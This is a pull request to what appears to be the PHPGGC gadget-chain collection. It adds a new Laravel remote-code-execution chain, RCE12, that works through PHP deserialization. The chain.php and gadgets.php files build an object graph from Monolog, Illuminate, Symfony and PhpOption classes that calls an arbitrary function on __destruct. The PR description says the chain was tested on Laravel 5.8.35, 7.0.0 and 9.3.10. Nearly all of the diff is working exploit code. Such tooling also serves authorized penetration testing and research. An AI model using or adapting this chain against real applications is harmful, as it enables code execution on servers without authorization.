### PR TITLE
Add chain for Laravel

### DIFF
--- a/README.md
+++ b/README.md
@@ -41,7 +41,8 @@ Kohana/FR1                                3.*                                Fil
 Laminas/FD1                               <= 2.11.2                          File delete            __destruct          
 Laminas/FW1                               2.8.0 <= 3.0.x-dev                 File write             __destruct     *    
 Laravel/RCE1                              5.4.27                             RCE (Function call)    __destruct          
-Laravel/RCE10                             5.6.0 <= 9.1.8+                    RCE (Function call)    __toString          
+Laravel/RCE10                             5.6.0 <= 9.1.8+                    RCE (Function call)    __toString
+Laravel/RCE12                             5.8.35, 7.0.0, 9.3.10              RCE (Function call)    __destruct     *
 Laravel/RCE2                              5.4.0 <= 8.6.9+                    RCE (Function call)    __destruct          
 Laravel/RCE3                              5.5.0 <= 5.8.35                    RCE (Function call)    __destruct     *    
 Laravel/RCE4                              5.4.0 <= 8.6.9+                    RCE (Function call)    __destruct          

--- a/gadgetchains/Laravel/RCE/12/chain.php
+++ b/gadgetchains/Laravel/RCE/12/chain.php
@@ -1,0 +1,22 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '5.8.35, 7.0.0, 9.3.10';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+    public static $information = 'According to different version you may need to modify the "gadgets.php". For Laravel5, use the field $rollbarNotifier. For laravel7 and later, use the filed $rollbarLogger';
+
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $param = $parameters['parameter'];
+
+        $a = new \Monolog\Handler\RollbarHandler($function, $param);
+
+        return $a;
+    }
+}

--- a/gadgetchains/Laravel/RCE/12/gadgets.php
+++ b/gadgetchains/Laravel/RCE/12/gadgets.php
@@ -1,0 +1,90 @@
+<?php
+
+namespace Monolog\Handler{
+    class RollbarHandler{
+        private $hasRecords;
+        //protected $rollbarNotifier;
+        protected $rollbarLogger;
+
+        function __construct($function,$paramter)
+        {
+            $this->hasRecords = true;
+            //$this->rollbarNotifier = new \Illuminate\Foundation\Support\Providers\RouteServiceProvider($function,$paramter);//laravel5.8.35
+            $this->rollbarLogger = new \Illuminate\Foundation\Support\Providers\RouteServiceProvider($function,$paramter);//laravel7.0.0
+        }
+    }
+}
+
+namespace Illuminate\Foundation\Support\Providers{
+    class RouteServiceProvider{
+        protected $app;
+
+        function __construct($function,$paramter)
+        {
+            $this->app = new \Illuminate\View\Factory($function,$paramter);
+        }
+    }
+}
+
+namespace Illuminate\View{
+    class Factory{
+        protected $finder;
+
+        function __construct($function,$paramter)
+        {
+            $this->finder = new \Symfony\Component\Console\Application($function,$paramter);
+        }
+
+    }
+}
+
+namespace Symfony\Component\Console{
+    class Application{
+        private $initialized;
+        private $commands;
+        private $commandLoader;
+
+        function __construct($function,$paramter)
+        {
+            $this->initialized = true;
+            $this->commandLoader = new \Illuminate\Cache\Repository($function,$paramter);
+            $this->commands = [new \Illuminate\Foundation\AliasLoader()];
+        }
+    }
+}
+
+namespace Illuminate\Foundation{
+    class AliasLoader{
+        protected $aliases;
+
+        function __construct()
+        {
+            $this->aliases = ["key"];   
+        }
+    }
+}
+
+namespace Illuminate\Cache{
+    class Repository{
+        protected $store;
+
+        function __construct($function,$paramter)
+        {
+            $this->store = new \PhpOption\LazyOption($function,$paramter);   
+        }
+    }
+}
+
+namespace PhpOption{
+    class LazyOption{
+        private $option;
+        private $callback;
+        private $arguments;
+
+        function __construct($function,$paramter)
+        {
+            $this->callback = $function;
+            $this->arguments = [$paramter];
+        }
+    }
+}


### PR DESCRIPTION
I test the payload on three versions: 5.8.35,  7.0.0 and the latest 9.3.10. 
It may be a little troublesome that we need modify the "gadgets.php" sometime. For 5, use the field "rollbarNotifier" of the entry. For 7 or latter, use the field "rollbarLogger" of the entry.
It also works for the latest version 9.3.10. But by the way, the latest version requires PHP > 8, so ......